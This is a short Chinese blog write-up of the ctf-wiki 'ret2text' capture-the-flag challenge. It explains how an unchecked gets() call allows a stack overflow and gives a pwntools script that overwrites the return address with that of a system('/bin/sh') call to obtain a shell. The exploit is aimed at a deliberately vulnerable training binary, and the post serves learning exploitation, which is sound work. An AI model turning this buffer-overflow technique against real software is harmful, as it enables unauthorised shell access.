ret2text ROP绕过策略

下载链接:https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2text/bamboofox-ret2text/ret2text

分析

chmod 777 文件名 开启权限
1.先查看安全防护机制 :checksec ret2text
2.将文件拖入IDA中,反汇编发现代码中出现gets函数。我们知道gets函数是一个无线读取的函数。只要我们的栈空间足够大,我们就可以输入无线的字符。: 这也是漏洞的所在地
3.我们先进文件头拖入IDA中的时候,在主页面找找有没有/bin/sh了类似的字符串。

图片.png
secure函数又发现了存在调用 system("/bin/sh") 的代码,那么如果我们直接控制程序返回至 0x0804863A,那么就可以得到系统的 shell 了
4.我们进入kali将断点我们发现的/bin/sh处,当程序运行到我们secure处会直接得到系统的shell.

实践

1.

图片.png

esp:0xffffd0b0
s(输入字节的地址):
图片.png
sbp:0xffffd138

注:我们的s是数据开始输入的地址
思路:我们知道了:数据中可以利用数据段的地址,栈空间的大小

代码

##!/usr/bin/env python
from pwn import *

sh = process('./ret2text')
target = 0x804863a
sh.sendline('A' * (0x6c+4) + p32(target))
sh.interactive()

效果图:
图片.png
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 今天,在朋友圈偶然看到一个朋友家庭聚餐的视频。 这个朋友是我幼时的同学,工作后很少回去,自然很少见面。 在我的印象...
    须臾_a016阅读 3,051评论 0 1
  • 把我介绍给你的好闺蜜呀 你愿意主动把你的朋友介绍给他人吗?或者换句话说你的朋友是否愿意主动把你介绍给别人认识? 根...
    蜡笔小幸阅读 9,658评论 1 3
  • 大家好, 我是天使2.0本周轮值组长,张丹 用易效能三个标签介绍自己 1.我是5岁男宝宝妈妈 2.我是大学老师,播...
    素锦_b3dd阅读 1,690评论 0 0
  • 运算符和表达式。 程序:人的想法,在计算机中的执行。 运算符:程序中,模拟人的想法的运算符号。 表达式:由变量,数...
    5e34228c9e5d阅读 1,098评论 0 0